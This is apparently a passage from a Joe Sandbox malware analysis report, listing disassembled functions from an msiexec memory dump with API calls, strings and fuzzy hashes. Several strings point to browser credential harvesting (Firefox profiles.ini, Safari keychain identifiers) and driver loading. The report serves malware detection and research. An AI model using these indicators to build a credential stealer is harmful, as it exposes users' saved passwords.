                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                      • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free
                      • String ID:
                      • API String ID: 1294909896-0
                      • Opcode ID: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                      • Opcode Fuzzy Hash: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                      APIs
                      • EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • GetLastError.KERNEL32 ref: 0040995D
                      • CloseHandle.KERNEL32(?), ref: 00409969
                      • GetLastError.KERNEL32 ref: 00409974
                      • CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                      • String ID:
                      • API String ID: 3604893535-0
                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                      APIs
                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                      APIs
                      • EmptyClipboard.USER32 ref: 00409882
                      • wcslen.MSVCRT ref: 0040988F
                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                      • CloseClipboard.USER32 ref: 004098D7
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                      • String ID:
                      • API String ID: 1213725291-0
                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                      APIs
                      • GetLastError.KERNEL32 ref: 004182D7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                      • LocalFree.KERNEL32(?), ref: 00418342
                      • free.MSVCRT ref: 00418370
                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                      • String ID: OsError 0x%x (%u)
                      • API String ID: 2360000266-2664311388
                      • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                      • Opcode Fuzzy Hash: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                      APIs
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • OpenClipboard.USER32(?), ref: 00411878
                      • GetLastError.KERNEL32 ref: 0041188D
                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                      • String ID:
                      • API String ID: 2628231878-0
                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID:
                      • API String ID: 1865533344-0
                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                      APIs
                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: NtdllProc_Window
                      • String ID:
                      • API String ID: 4255912815-0
                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                      APIs
                      • _wcsicmp.MSVCRT ref: 004022A6
                      • _wcsicmp.MSVCRT ref: 004022D7
                      • _wcsicmp.MSVCRT ref: 00402305
                      • _wcsicmp.MSVCRT ref: 00402333
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                      • memset.MSVCRT ref: 0040265F
                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                      • API String ID: 577499730-1134094380
                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                      • String ID: :stringdata$ftp://$http://$https://
                      • API String ID: 2787044678-1921111777
                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                      • GetWindowRect.USER32(?,?), ref: 00414088
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                      • GetDC.USER32 ref: 004140E3
                      • wcslen.MSVCRT ref: 00414123
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                      • ReleaseDC.USER32(?,?), ref: 00414181
                      • _snwprintf.MSVCRT ref: 00414244
                      • SetWindowTextW.USER32(?,?), ref: 00414258
                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                      • GetClientRect.USER32(?,?), ref: 004142E1
                      • GetWindowRect.USER32(?,?), ref: 004142EB
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                      • GetClientRect.USER32(?,?), ref: 0041433B
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 2080319088-3046471546
                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                      APIs
                      • EndDialog.USER32(?,?), ref: 00413221
                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                      • memset.MSVCRT ref: 00413292
                      • memset.MSVCRT ref: 004132B4
                      • memset.MSVCRT ref: 004132CD
                      • memset.MSVCRT ref: 004132E1
                      • memset.MSVCRT ref: 004132FB
                      • memset.MSVCRT ref: 00413310
                      • GetCurrentProcess.KERNEL32 ref: 00413318
                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                      • memset.MSVCRT ref: 004133C0
                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                      • wcscpy.MSVCRT ref: 0041341F
                      • _snwprintf.MSVCRT ref: 0041348E
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                      • SetFocus.USER32(00000000), ref: 004134B7
                      Strings
                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                      • {Unknown}, xrefs: 004132A6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                      • API String ID: 4111938811-1819279800
                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                      • EndDialog.USER32(?,?), ref: 0040135E
                      • DeleteObject.GDI32(?), ref: 0040136A
                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                      • ShowWindow.USER32(00000000), ref: 00401398
                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                      • ShowWindow.USER32(00000000), ref: 004013A7
                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                      • String ID:
                      • API String ID: 829165378-0
                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                      APIs
                      • memset.MSVCRT ref: 00404172
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 004041D6
                      • wcscpy.MSVCRT ref: 004041E7
                      • memset.MSVCRT ref: 00404200
                      • memset.MSVCRT ref: 00404215
                      • _snwprintf.MSVCRT ref: 0040422F
                      • wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 0040426E
                      • memset.MSVCRT ref: 004042CD
                      • memset.MSVCRT ref: 004042E2
                      • _snwprintf.MSVCRT ref: 004042FE
                      • wcscpy.MSVCRT ref: 00404311
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                      • API String ID: 2454223109-1580313836
                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                      APIs
                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                      • SetMenu.USER32(?,00000000), ref: 00411453
                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                      • ShowWindow.USER32(?,?), ref: 004115FE
                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                      • API String ID: 4054529287-3175352466
                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset$wcscpy
                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                      • API String ID: 3143752011-1996832678
                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                      • API String ID: 667068680-2887671607
                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
